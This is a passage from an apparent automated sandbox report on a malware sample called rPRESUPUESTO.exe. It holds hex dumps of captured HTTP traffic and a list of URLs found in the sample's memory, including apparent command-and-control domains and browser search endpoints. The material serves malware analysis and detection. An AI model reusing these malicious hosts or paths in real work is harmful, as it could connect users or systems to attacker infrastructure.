f8 9c 3a df ac 23 af 46 1c 55 29 b9 c8 30 88 53 13 6f 3a b5 a9 a7 8e 16 0a 85 56 aa 4a 8d c5 a6 49 1d 96 f5 c9 37 58 cd 15 dc 85 52 b4 34 51 9d d8 8b aa c4 db 77 8f 3a 3f 4a ad 94 5c 47 c4 69 ce 13 83 59 6a 51 51 44 5e 02 9d 53 3e 04 a8 c1 68 49 e4 44 f4 cd 2a d2 67 6a 1e 6d 38 86 0a 46 f3 0a ba 30 8e 12 52 30 6a 9a 66 4c 10 f1 81 5c 51 00 59 98 d4 2c a6 82 42 88 6a 13 07 67 4f 45 92 ce b3 36 36 45 52 3e 4c 12 54 ba e8 12 3b 6c 88 2c 9b 08 33 c7 cd 8f cc 8b 25 90 80 e4 27 c2 8a 2a f5 0c ec a9 39 77 01 18 c8 b7 b0 01 46 f5 a2 71 b1 5a 1c 0c 26 04 0e 25 e4 9a 71 6e b6 4a 19 a3 75 d1 e3 d9 9a 98 29 54 53 50 14 25 16 34 9f a8 a8 52 db 28 81 64 38 40 11 ff a8 65 d0 97 31 80 9d 88 85 b0 7c b2 49 7d c2 30 0e a2 4d 48 20 43 c4 56 8a da 83 cd 4c 30 41 3e 2f 52 df 6e 6c 98 03 6c d2 1c 1e e1 78 a4 4a 83 89 21 34 68 c5 b6 f2 75 8f b8 ec ad b1 be 9c fe 44 18 0b 10 a3 2c 4d 5d fa fa f2 67 53 53 93 97 a7 25 e0 7b 7a 59 82 d0 37 66 e4 0b 39 d9 46 f0 86 9f 15 8b ac eb 51 b9 4e 1c f9 86 2f 55 04 78 04 26 5c 99 bc 4c 5d 92 89 43 58 ba 49 0c 55 ba fa f9 dc 17 b4 46 ae 91 85 8f 27 27 ad 6b 57 a4 31 7d e6 3d d1 56 66 08 27 b4 65 25 35 a2 19 64 0e e8 36 f2 fd b2 14 da 4f 18 7f e4 54 30 f2 9b 74 f6 18 88 ba 77 53 13 bf 44 10 23 9a db 87 65 39 a9 12 2c ff d9 dd fa ae f7 f4 45 f0 6c 99 bf dc 0d 7e be 73 f4 f2 3e 5f bb 1d ec af f3 d5 e5 60 fd ef 93 c3 7b fc c5 f3 de ce 5e 7c de ba ed 5f bb 6b 2b fc c1 46 af fd ba db 69 07 77 77 83 db 7f 9d 1c 2e 69 d0 7d 17 3d 2f 55 f8 ea d3 de b7 1d fe c3 23 be fd cb c9 e1 d6 20 89 8a b3 2e 5a 19 d1 6c 12 76 10 ac ae 1d bd fa 4d f4 c1 57 6e f1 f6 bf fc de 2d be b6 c7 ef 3f 3b de 7c 22 82 c1 c3 03 fe fd 41 dc a2 06 45 45 a4 02 26 18 43 72 42 c2 dd e5 a3 ce 7a ef 8f c7 7c 65 ff 7f 09 1f df 0c 1e fd 1e 73 c6 84 27 87 db 03 e0 a8 27 01 13 cb 0d ee 6c 08 c5 62 06 82 be b7 f4 b0 bb 7f d0 7d f2 ea f8 a7 7f c2 ea d7 db 7c 7d e5 4c 69 b0 d9 3e be b9 15 57 f7 da 6f 78 7b e7 54 75 74 69 0d 86 38 5c dd 57 a4 c1 78 07 93 a7 06 63 43 f4 fd 95 02 83 9f b8 15 a7 49 1d d3 06 4b 9b 0d 47 67 84 3a e9 4c 73 28 01 cc 21 0f 20 cf 2b 5f 3f 67 31 e6 aa 10 d6 66 8b 85 d9 82 ac 3b b0 e1 63 0f 1a d8 27 35 07 86 36 83 58 44 a0 3f e3 37 f0 ec 6c 63 d6 84 13 b9 73 63 5f 95 86 d0 e6 89 63 d0 79 d9 a6 3a 0a a9 64 cb c3 66 59 a0 5f 77 c3 0b fa 8a c3 d
            Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: nginxDate: Mon, 01 Jul 2024 14:17:48 GMTContent-Type: text/htmlTransfer-Encoding: chunkedConnection: closeVary: Accept-EncodingCache-Control: no-cacheData Raw: 36 31 33 0d 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 74 69 74 6c 65 3e 0a 3c 73 74 79 6c 65 3e 0a 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 3b 63 6f 6c 6f 72 3a 23 34 34 34 7d 0a 62 6f 64 79 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 34 70 78 3b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 e5 ae 8b e4 bd 93 22 7d 0a 2e 6d 61 69 6e 7b 77 69 64 74 68 3a 36 30 30 70 78 3b 6d 61 72 67 69 6e 3a 31 30 25 20 61 75 74 6f 3b 7d 0a 2e 74 69 74 6c 65 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 20 23 32 30 61 35 33 61 3b 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 68 65 69 67 68 74 3a 20 34 30 70 78 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 34 30 70 78 3b 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a 20 32 30 70 78 3b 7d 0a 2e 63 6f 6e 74 65 6e 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 33 66 37 66 39 3b 20 68 65 69 67 68 74 3a 32 38 30 70 78 3b 62 6f 72 64 65 72 3a 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 70 61 64 64 69 6e 67 3a 32 30 70 78 7d 0a 2e 74 31 7b 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 64 61 73 68 65 64 20 23 63 36 64 39 62 36 3b 63 6f 6c 6f 72 3a 20 23 66 66 34 30 30 30 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 20 6d 61 72 67 69 6e 3a 20 30 20 30 20 32 30 70 78 3b 20 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 20 31 38 70 78 3b 7d 0a 2e 74 32 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 38 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 7d 0a 6f 6c 7b 6d 61 72 67 69 6e 3a 30 20 30 20 32 30 70 78 20 32 32 70 78 3b 70 61 64 64 69 6e 67 3a 30 3b 7d 0a 6f 6c 20 6c 69 7b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 30 70 78 7d 0a 3c 2f 73 74 79 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 73 63 72 69 70 74 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 20 69 64 3d 22 4c 41 5f 43 4f 4c 4c 45 43 54 22 20 73 72 63 3d 22 2f 2f 73 64 6b 2e 35 31 2e 6c 61 2f 6a 73 2d 73 64 6b 2d 70 72 6f 2e 6d 69 6e 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 3c 73 63 72 69 70 74 3e 4c 41 2e 69 6e 69 74 28 7b 69 64 3a 22 4b 50 76 53 6f 67 69 57 69 78 42 45 45 68 57 49 22 2c 63 6b 3a 22 4b 50 76 53 6f 67 69 57 69 78 42 45 45 68 57 49 22 7d 29 3c 2f 73 63 72 69 70 74 3e 0a 3c 62 6f 64 79 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6d 61 69 6e 22 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 69 74 6c 65 22 3e e7 bd 91 e7 ab 99 e9 98 b2 e7 81 ab e5 a2 99 3c 2f 64 69 76 3e 0a 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 6f 6e 74 65 6e 74 22 3e 0a 09 09 09 3c 70 20 63 6c 61 73 73 3d 22 74 31 22 3e e6 82 a8 e7 9a 84 e8 af b7 e6 b1 82 e5 b8 a6 e6 9c 89 e4 b8 8d e5 90 88 e6 b3 95 e5 8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Jul 2024 14:18:07 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Jul 2024 14:18:10 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Jul 2024 14:18:12 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=us-asciiServer: Microsoft-HTTPAPI/2.0Date: Mon, 01 Jul 2024 14:18:14 GMTConnection: closeContent-Length: 315Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 48 54 4d 4c 20 34 2e 30 31 2f 2f 45 4e 22 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 68 74 6d 6c 34 2f 73 74 72 69 63 74 2e 64 74 64 22 3e 0d 0a 3c 48 54 4d 4c 3e 3c 48 45 41 44 3e 3c 54 49 54 4c 45 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 54 49 54 4c 45 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 43 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 73 2d 61 73 63 69 69 22 3e 3c 2f 48 45 41 44 3e 0d 0a 3c 42 4f 44 59 3e 3c 68 32 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 68 72 3e 3c 70 3e 48 54 54 50 20 45 72 72 6f 72 20 34 30 34 2e 20 54 68 65 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 69 73 20 6e 6f 74 20 66 6f 75 6e 64 2e 3c 2f 70 3e 0d 0a 3c 2f 42 4f 44 59 3e 3c 2f 48 54 4d 4c 3e 0d 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN""http://www.w3.org/TR/html4/strict.dtd"><HTML><HEAD><TITLE>Not Found</TITLE><META HTTP-EQUIV="Content-Type" Content="text/html; charset=us-ascii"></HEAD><BODY><h2>Not Found</h2><hr><p>HTTP Error 404. The requested resource is not found.</p></BODY></HTML>
            Source: rPRESUPUESTO.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
            Source: rPRESUPUESTO.exeString found in binary or memory: http://crl.comodoca.com/COMODORSACodeSigningCA.crl0t
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000003EA0000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000003E80000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://gq64q4.cn/user/design/clas/euse/sksueqquqf/81
            Source: rPRESUPUESTO.exeString found in binary or memory: http://ocsp.comodoca.com0
            Source: rPRESUPUESTO.exe, 00000000.00000002.2154526498.0000000002951000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: ktmutil.exe, 00000009.00000002.4589157081.00000000044E8000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.00000000044C8000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ww16.atmpla.net/n983/?3hkl=slNhbLXpBjO8vl&4dV43tA=e
            Source: ktmutil.exe, 00000009.00000002.4589157081.000000000467A000.00000004.10000000.00040000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.000000000465A000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: http://ww7.europedriveguide.com/2pcd/?4dV43tA=tIH23YAAyU0vk1VwVlLsnDkrzub9KGyrHgMKKMQURaOCIZhbg0Upzh
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4590404042.00000000055B8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.genesiestudios.online
            Source: MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4590404042.00000000055B8000.00000040.80000000.00040000.00000000.sdmpString found in binary or memory: http://www.genesiestudios.online/s29p/
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://active24.com/cssc/a21/main.less?v=7d8e320747f67055c1a1008fbc40d0c1
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://active24.cz/objednavka/domain/availability/list
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://blog.active24.cz//
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://customer.active24.com/
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
            Source: ktmutil.exe, 00000009.00000003.2514429611.0000000007568000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/045021-Webov%c3%a9-str%c3%a1nky-a-E-shopy
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/085122-Hosting-a-Servery
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/162807-DNS-hosting?l=cs
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/757409-Bezpe%c4%8dnost
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/806087-Z%c3%a1kladn%c3%ad-informace
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/808905-E-mailov%c3%a1-%c5%99e%c5%a1en%c3%ad
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/920729-Dom%c3%a9ny-a-DNS
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/932337-Spolupr%c3%a1ce
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://faq.active24.com/cz/939671-Fakturace-a-platby
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://fonts.googleapis.com/css?family=Titillium
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/css/landing.css
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/font/active24-icons.eot
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/font/active24-icons.svg
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/font/active24-icons.ttf
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/font/active24-icons.woff
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/default-domain/dns.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/default-domain/dnssec.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/default-domain/free.png
            Source: ktmutil.exe, 00000009.00000002.4589157081.0000000004356000.00000004.10000000.00040000.00000000.sdmp, ktmutil.exe, 00000009.00000002.4590936412.00000000059D0000.00000004.00000800.00020000.00000000.sdmp, MqDMLUHvZmSMqiwTfIsHo.exe, 0000000A.00000002.4588635921.0000000004336000.00000004.00000001.00040000.00000000.sdmpString found in binary or memory: https://gui.active24.cz/img/default-domain/image.png
